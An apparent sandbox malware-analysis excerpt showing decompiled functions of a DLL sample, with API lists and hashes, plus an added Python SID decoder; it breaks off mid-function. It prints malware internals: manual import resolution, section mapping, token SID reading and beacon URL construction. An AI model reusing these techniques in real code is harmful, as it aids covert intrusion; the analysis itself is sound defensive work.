                                                  • Instruction Fuzzy Hash: AA21D2B2900219BFDB119F96CE85EDEBFBDEB08750F104026F914F6121D7729A469BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
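The function above opens the target process with access mask 0x400 (PROCESS_QUERY_INFORMATION), opens its token with 8 (TOKEN_QUERY), calls NtQueryInformationToken with class 1 (TokenUser) twice, first to learn the size and then to fill a heap buffer, and finally copies 0x1c bytes from the Sid pointer at the start of the returned TOKEN_USER into the caller's buffer. 0x1c = 28 bytes is exactly the length of a SID with five sub-authorities (an 8-byte header plus 5 x 4 bytes), the S-1-5-21-...-RID shape of a local or domain account; that size reading is my inference, the listing itself only shows the memcpy length. The Python below decodes such a raw SID blob into its string form, so an analyst who dumps the 0x1c-byte buffer can see what the sample is collecting, and flags SIDs that a fixed 0x1c-byte copy would truncate. It is an added example, not code from the sample or from Joe Sandbox, and the SID bytes it parses are constructed here.

```python
import struct

SID_MAX_SUB_AUTHORITIES = 15  # fixed by the SID format


def parse_sid(blob: bytes) -> str:
    """Decode a raw Windows SID into S-R-I-S1-...-Sn form.

    Layout: Revision (1 byte), SubAuthorityCount (1 byte), IdentifierAuthority
    (6 bytes, big-endian), then SubAuthorityCount 32-bit little-endian values.
    Bytes beyond the declared length are ignored, which is what makes a fixed
    0x1c-byte copy of a shorter SID (plus whatever followed it on the heap)
    still decodable.
    """
    if len(blob) < 8:
        raise ValueError("SID blob shorter than the 8-byte header")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > SID_MAX_SUB_AUTHORITIES:
        raise ValueError(f"SubAuthorityCount {count} exceeds {SID_MAX_SUB_AUTHORITIES}")
    need = 8 + 4 * count
    if len(blob) < need:
        raise ValueError(f"SID declares {count} sub-authorities ({need} bytes), only {len(blob)} present")
    authority = int.from_bytes(blob[2:8], "big")
    # Windows renders identifier authorities that do not fit in 32 bits as hex
    auth_str = f"0x{authority:012X}" if authority >= 1 << 32 else str(authority)
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "-".join(["S", str(revision), auth_str, *map(str, subs)])


def sid_length(blob: bytes) -> int:
    """Real length of the SID at the start of blob: 8 + 4 * SubAuthorityCount."""
    return 8 + 4 * blob[1]


def truncated_by_fixed_copy(blob: bytes, copy_len: int = 0x1C) -> bool:
    """True if a memcpy of copy_len bytes would cut this SID short; with the
    sample's 0x1c that is any SID with more than five sub-authorities."""
    return sid_length(blob) > copy_len


def build_sid(authority: int, *subs: int) -> bytes:
    """Constructed helper that assembles a revision-1 SID for the examples below."""
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


# Constructed sample inputs (not data from the sandbox run):
# a typical account SID, exactly 0x1c bytes, the case the sample's copy fits
ACCOUNT_SID = build_sid(5, 21, 1111111111, 2222222222, 3333333333, 1001)
# "Everyone" (S-1-1-0) as it would arrive after a fixed 0x1c-byte copy:
# the 12-byte SID followed by 16 bytes of whatever lay after it on the heap
EVERYONE_COPY = (build_sid(1, 0) + b"\xAA" * 0x1C)[:0x1C]

if __name__ == "__main__":
    print(parse_sid(ACCOUNT_SID))    # S-1-5-21-1111111111-2222222222-3333333333-1001
    print(parse_sid(EVERYONE_COPY))  # S-1-1-0
    print(truncated_by_fixed_copy(build_sid(5, 21, 1, 2, 3, 4, 5)))  # True
```

The parser trusts SubAuthorityCount only after bounding it, so a corrupted or hostile blob cannot make it read past the buffer; a real memory dump of the 0x1c-byte destination can be passed straight to `parse_sid`.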

                                                  C-Code - Quality: 72%
                                                  			E00401EB5(intOrPtr* __eax, void** _a4) {
                                                  				int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				int _v28;
                                                  				int _v32;
                                                  				intOrPtr _v36;
                                                  				int _v40;
                                                  				int _v44;
                                                  				void* _v48;
                                                  				void* __esi;
                                                  				long _t34;
                                                  				void* _t39;
                                                  				void* _t47;
                                                  				intOrPtr* _t48;
                                                  
                                                  				_t48 = __eax;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                  				_v16 = 0;
                                                  				_v12 = 0;
                                                  				_v48 = 0x18;
                                                  				_v44 = 0;
                                                  				_v36 = 0x40;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v28 = 0;
                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                  				if(_t34 < 0) {
                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                  				} else {
                                                  					 *_t48 = _v16;
                                                  					_t39 = E00401D9F(_t48,  &_v12); // executed
                                                  					_t47 = _t39;
                                                  					if(_t47 != 0) {
                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                  					} else {
                                                  						memset(_v12, 0, _v24);
                                                  						 *_a4 = _v12;
                                                  					}
                                                  				}
                                                  				return _t47;
			}

                                                  Instruction addresses of the C-code statements above, in listing order (the side-by-side address column was flattened during extraction): 0x00401ebe, 0x00401ec5, 0x00401ec6, 0x00401ec7, 0x00401ec8, 0x00401ec9, 0x00401eda, 0x00401ede, 0x00401ef2, 0x00401ef5, 0x00401ef8, 0x00401eff, 0x00401f02, 0x00401f09, 0x00401f0c, 0x00401f0f, 0x00401f12, 0x00401f17, 0x00401f52, 0x00401f19, 0x00401f1c, 0x00401f22, 0x00401f27, 0x00401f2b, 0x00401f49, 0x00401f2d, 0x00401f34, 0x00401f42, 0x00401f42, 0x00401f2b, 0x00401f5a

                                                  APIs
                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401F12
                                                    • Part of subcall function 00401D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                  • memset.NTDLL ref: 00401F34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Section$CreateViewmemset
                                                  • String ID: @
                                                  • API String ID: 2533685722-2766056989
                                                  • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction ID: 68d8c8f26fc330075f7cb601c6588f33ac635daa3c13fb39122687157e3906a1
                                                  • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                  • Instruction Fuzzy Hash: 92211DB1D00209AFDB11DFA9C8849EEFBB9FF48354F10447AE606F3250D734AA498B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401745(void* __edi, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				intOrPtr* _v12;
                                                  				_Unknown_base(*)()** _v16;
                                                  				signed int _v20;
                                                  				signed short _v24;
                                                  				struct HINSTANCE__* _v28;
                                                  				intOrPtr _t43;
                                                  				intOrPtr* _t45;
                                                  				intOrPtr _t46;
                                                  				struct HINSTANCE__* _t47;
                                                  				intOrPtr* _t49;
                                                  				intOrPtr _t50;
                                                  				signed short _t51;
                                                  				_Unknown_base(*)()* _t53;
                                                  				CHAR* _t54;
                                                  				_Unknown_base(*)()* _t55;
                                                  				void* _t58;
                                                  				signed int _t59;
                                                  				_Unknown_base(*)()* _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t65;
                                                  				signed int _t68;
                                                  				void* _t69;
                                                  				CHAR* _t71;
                                                  				signed short* _t73;
                                                  
                                                  				_t69 = __edi;
                                                  				_v20 = _v20 & 0x00000000;
                                                  				_t59 =  *0x40414c;
                                                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                  				if(_t43 != 0) {
                                                  					_t45 = _t43 + __edi;
                                                  					_v12 = _t45;
                                                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                  					if(_t46 != 0) {
                                                  						while(1) {
                                                  							_t71 = _t46 + _t69;
                                                  							_t47 = LoadLibraryA(_t71); // executed
                                                  							_v28 = _t47;
                                                  							if(_t47 == 0) {
                                                  								break;
                                                  							}
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_t71 = _t59 - 0x63699bc3;
                                                  							_t49 = _v12;
                                                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                  							_t50 =  *_t49;
                                                  							if(_t50 != 0) {
                                                  								L6:
                                                  								_t73 = _t50 + _t69;
                                                  								_v16 = _t61 + _t69;
                                                  								while(1) {
                                                  									_t51 =  *_t73;
                                                  									if(_t51 == 0) {
                                                  										break;
                                                  									}
                                                  									if(__eflags < 0) {
                                                  										__eflags = _t51 - _t69;
                                                  										if(_t51 < _t69) {
                                                  											L12:
                                                  											_t21 =  &_v8;
                                                  											 *_t21 = _v8 & 0x00000000;
                                                  											__eflags =  *_t21;
                                                  											_v24 =  *_t73 & 0x0000ffff;
                                                  										} else {
                                                  											_t65 = _a4;
                                                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                  												goto L12;
                                                  											} else {
                                                  												goto L11;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t51 = _t51 + _t69;
                                                  										L11:
                                                  										_v8 = _t51;
                                                  									}
                                                  									_t53 = _v8;
                                                  									__eflags = _t53;
                                                  									if(_t53 == 0) {
                                                  										_t54 = _v24 & 0x0000ffff;
                                                  									} else {
                                                  										_t54 = _t53 + 2;
                                                  									}
                                                  									_t55 = GetProcAddress(_v28, _t54);
                                                  									__eflags = _t55;
                                                  									if(__eflags == 0) {
                                                  										_v20 = _t59 - 0x63699b44;
                                                  									} else {
                                                  										_t68 = _v8;
                                                  										__eflags = _t68;
                                                  										if(_t68 != 0) {
                                                  											 *_t68 = _t59 - 0x63699bc3;
                                                  										}
                                                  										 *_v16 = _t55;
                                                  										_t58 = 0x725990f8 + _t59 * 4;
                                                  										_t73 = _t73 + _t58;
                                                  										_t32 =  &_v16;
                                                  										 *_t32 = _v16 + _t58;
                                                  										__eflags =  *_t32;
                                                  										continue;
                                                  									}
                                                  									goto L23;
                                                  								}
                                                  							} else {
                                                  								_t50 = _t61;
                                                  								if(_t61 != 0) {
                                                  									goto L6;
                                                  								}
                                                  							}
                                                  							L23:
                                                  							_v12 = _v12 + 0x14;
                                                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                  							if(_t46 != 0) {
                                                  								continue;
                                                  							} else {
                                                  							}
                                                  							L26:
                                                  							goto L27;
                                                  						}
                                                  						_t60 = _t59 + 0x9c9664bb;
                                                  						__eflags = _t60;
                                                  						_v20 = _t60;
                                                  						goto L26;
                                                  					}
                                                  				}
                                                  				L27:
                                                  				return _v20;
                                                  			}

                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004017EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID:
                                                  • API String ID: 2574300362-0
                                                  • Opcode ID: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                  • Instruction ID: 20e41381af83e98fed74a613c3f7ab7ed5ea214225131684d0572623078a26fe
                                                  • Opcode Fuzzy Hash: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                  • Instruction Fuzzy Hash: A2310C76A0020A9FDB15CF59C980AAEB7F4BF45315F24807AD805F73A0E778DA41DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00401D9F(void** __esi, PVOID* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				long _t13;
                                                  
                                                  				_v16 = 0;
                                                  				asm("stosd");
                                                  				_v8 = 0;
                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                  				if(_t13 < 0) {
                                                  					_push(_t13);
                                                  					return __esi[6]();
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction ID: d47de4e0d58a28ad62aca0fe1954c9537e19fd45f2cb1026219e244723f4612c
                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                  • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44358F10497AB152E10A0D630AE089A60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E00EC8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				signed int _t112;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0xecd018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0xecd014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0xecd010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0xecd00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0xecd27c; // 0x213a5a8
                                                  				_t3 = _t64 + 0xece633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0xecd02c,  *0xecd004, _t59);
                                                  				_t67 = E00EC1C1A();
                                                  				_t68 =  *0xecd27c; // 0x213a5a8
                                                  				_t4 = _t68 + 0xece673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71; // executed
                                                  				_t72 = E00EC54BC(_t135); // executed
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0xecd27c; // 0x213a5a8
                                                  					_t7 = _t127 + 0xece8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0xecd238, 0, _v8);
                                                  				}
                                                  				_t73 = E00EC7649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t122 =  *0xecd27c; // 0x213a5a8
                                                  					_t11 = _t122 + 0xece8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0xecd238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0xecd32c; // 0x30095b0
                                                  				_t75 = E00EC9395(0xecd00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					RtlFreeHeap( *0xecd238, _t153, _a16); // executed
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0xecd238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0xecd238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E00EC7A80(GetTickCount());
                                                  					_t82 =  *0xecd32c; // 0x30095b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0xecd32c; // 0x30095b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0xecd32c; // 0x30095b0
                                                  					_t149 = E00EC8307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0xecd238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0xecc2ac);
                                                  					_push(_t149);
                                                  					_t94 = E00EC3CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0xecd238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                  					_t155 = __imp__;
                                                  					 *_t155(_v8, _v16);
                                                  					 *_t155(_v8, _t149);
                                                  					_t101 = E00EC809F(0, _v8);
                                                  					_a4 = _t101;
                                                  					if(_t101 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E00ECA1B0();
                                                  						L22:
                                                  						HeapFree( *0xecd238, 0, _v16);
                                                  						_t153 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t105 = E00EC43DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                                                  					_v12 = _t105;
                                                  					if(_t105 == 0) {
                                                  						_t158 = _v24;
                                                  						_t112 = E00EC163F(_t158, _a4, _a8, _a12); // executed
                                                  						_v12 = _t112;
                                                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                  						_t119 =  *_t158;
                                                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                  						E00EC9039(_t158);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t107 = _a8;
                                                  							if(_t107 != 0) {
                                                  								_t150 =  *_t107;
                                                  								_t156 =  *_a12;
                                                  								wcstombs( *_t107,  *_t107,  *_a12);
                                                  								_t110 = E00EC85DB(_t150, _t150, _t156 >> 1);
                                                  								_t149 = _v28;
                                                  								 *_a12 = _t110;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E00EC9039(_a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}
Instruction addresses 0x00ec8b94-0x00ec8e79 (address column of the listing; the instruction text itself was not captured)

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00EC8BA8
                                                  • wsprintfA.USER32 ref: 00EC8BF8
                                                  • wsprintfA.USER32 ref: 00EC8C15
                                                  • wsprintfA.USER32 ref: 00EC8C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8C53
                                                  • wsprintfA.USER32 ref: 00EC8C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00EC8CB2
                                                  • GetTickCount.KERNEL32 ref: 00EC8CC3
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC8CD7
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC8CF5
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC8307: strcpy.NTDLL ref: 00EC8351
                                                    • Part of subcall function 00EC8307: lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                  • StrTrimA.SHLWAPI(00000000,00ECC2AC,?,030095B0), ref: 00EC8D2C
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC3CC8: lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                    • Part of subcall function 00EC3CC8: lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00EC8D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 00EC8D55
                                                  • lstrcat.KERNEL32(?,?), ref: 00EC8D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00EC8D69
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
                                                  • wcstombs.NTDLL ref: 00EC8DFC
                                                    • Part of subcall function 00EC163F: SysAllocString.OLEAUT32(?), ref: 00EC1680
                                                    • Part of subcall function 00EC163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00EC1702
                                                    • Part of subcall function 00EC163F: StrStrIW.SHLWAPI(?,006E0069), ref: 00EC1741
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00EC8E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00EC8E49
                                                  • HeapFree.KERNEL32(00000000,?,?,030095B0), ref: 00EC8E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC8E61
                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00EC8E6D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                  • String ID: _h
                                                  • API String ID: 603507560-4139817520
                                                  • Opcode ID: 14380d448949f17d32434be0277f8cd539bd50e2b0f47cc02addc1a37a0f0e23
                                                  • Instruction ID: 0b20c29efb8069e2e8362321088420be043a680b010722894bc87860d4d88e76
                                                  • Opcode Fuzzy Hash: 14380d448949f17d32434be0277f8cd539bd50e2b0f47cc02addc1a37a0f0e23
                                                  • Instruction Fuzzy Hash: BF913971900208AFCB119FA9DE45E9ABBB9EF48314F144069F408F7261CB33D956DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph

(graph rendering not reproduced: 41 basic blocks spanning 0x00ecade5-0x00ecb01f, with API calls at RaiseException (3 blocks), LoadLibraryA, GetLastError (2 blocks), InterlockedExchange, FreeLibrary, LocalAlloc and GetProcAddress)
C-Code - Quality: 51%
Note: this routine has the layout of the MSVC CRT delay-load helper (__delayLoadHelper2): a 0x24-byte DelayLoadInfo block built on the stack (_v72.._v40), notify and failure hook pointers at 0xecd1a0 and 0xecd19c called with notification codes 0 to 5, the LoadLibraryA/GetProcAddress fallback with the loaded module cached through InterlockedExchange, and RaiseException with VcppException codes 0xc06d0057, 0xc06d007e and 0xc06d007f (ERROR_INVALID_PARAMETER, ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND). It is compiler-supplied runtime code rather than sample-specific logic; the imports it resolves are what is sample-specific.
                                                  			E00ECADE5(long _a4, long _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				LONG* _v28;
                                                  				long _v40;
                                                  				long _v44;
                                                  				long _v48;
                                                  				CHAR* _v52;
                                                  				long _v56;
                                                  				CHAR* _v60;
                                                  				long _v64;
                                                  				signed int* _v68;
                                                  				char _v72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				signed int _t81;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t83;
                                                  				intOrPtr* _t85;
                                                  				intOrPtr* _t90;
                                                  				intOrPtr* _t95;
                                                  				intOrPtr* _t98;
                                                  				struct HINSTANCE__* _t99;
                                                  				void* _t102;
                                                  				intOrPtr* _t104;
                                                  				void* _t115;
                                                  				long _t116;
                                                  				void _t125;
                                                  				void* _t131;
                                                  				signed short _t133;
                                                  				struct HINSTANCE__* _t138;
                                                  				signed int* _t139;
                                                  
                                                  				_t139 = _a4;
                                                  				_v28 = _t139[2] + 0xec0000;
                                                  				_t115 = _t139[3] + 0xec0000;
                                                  				_t131 = _t139[4] + 0xec0000;
                                                  				_v8 = _t139[7];
                                                  				_v60 = _t139[1] + 0xec0000;
                                                  				_v16 = _t139[5] + 0xec0000;
                                                  				_v64 = _a8;
                                                  				_v72 = 0x24;
                                                  				_v68 = _t139;
                                                  				_v56 = 0;
                                                  				asm("stosd");
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v40 = 0;
                                                  				if(( *_t139 & 0x00000001) == 0) {
                                                  					_a8 =  &_v72;
                                                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                  					return 0;
                                                  				}
                                                  				_t138 =  *_v28;
                                                  				_t76 = _a8 - _t115 >> 2 << 2;
                                                  				_t133 =  *(_t131 + _t76);
                                                  				_a4 = _t76;
                                                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                  				_v56 = _t80;
                                                  				_t81 = _t133 + 0xec0002;
                                                  				if(_t80 == 0) {
                                                  					_t81 = _t133 & 0x0000ffff;
                                                  				}
                                                  				_v52 = _t81;
                                                  				_t82 =  *0xecd1a0; // 0x0
                                                  				_t116 = 0;
                                                  				if(_t82 == 0) {
                                                  					L6:
                                                  					if(_t138 != 0) {
                                                  						L18:
                                                  						_t83 =  *0xecd1a0; // 0x0
                                                  						_v48 = _t138;
                                                  						if(_t83 != 0) {
                                                  							_t116 =  *_t83(2,  &_v72);
                                                  						}
